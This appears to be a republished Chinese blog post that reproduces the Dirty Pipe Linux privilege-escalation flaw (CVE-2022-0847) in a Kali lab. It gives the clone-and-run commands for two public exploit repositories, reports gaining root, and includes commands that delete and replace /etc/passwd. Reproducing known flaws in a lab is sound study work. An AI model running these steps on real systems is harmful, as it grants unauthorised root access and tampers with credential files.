【漏洞】臟管漏洞 CVE-2022-0847(復現)


臟管漏洞原理

原文鏈接:https://dirtypipe.cm4all.com/

復現環境

kali虛擬機,普通用戶

項目

參考鏈接:https://github.com/imfiver/CVE-2022-0847
項目下載:https://github.com/imfiver/CVE-2022-0847
依賴:gcc,git

利用過程

先用git將github中的項目克隆下來
git clone https://github.com/imfiver/CVE-2022-0847.git
跳轉到腳本所在文件夾
cd CVE-2022-0847
賦予腳本權限
chmod +x Dirty-Pipe.sh
運行腳本
bash Dirty-Pipe.sh

攻擊結果

直接從普通用戶提權到root用戶。下面也有恢復密碼的方法。

rm -rf /etc/passwd 
mv /tmp/passwd /etc/passwd


並且切換用戶時,root賬戶不需要密碼就可以登錄

另一個類似的

項目地址:https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

利用過程

下載命令

git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
cd CVE-2022-0847-DirtyPipe-Exploit-main

編譯文件./compile.sh
運行文件./exploit

攻擊結果

按作者所說,應該彈一個root權限的shell,但我的好像是什么系統函數調用失敗,只是把root賬號的密碼改成了aaron。后面試了普通用戶的密碼,root用戶的密碼,確實都失敗了,用aaron才成功。切換用戶試了試,也是aaron才成功。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM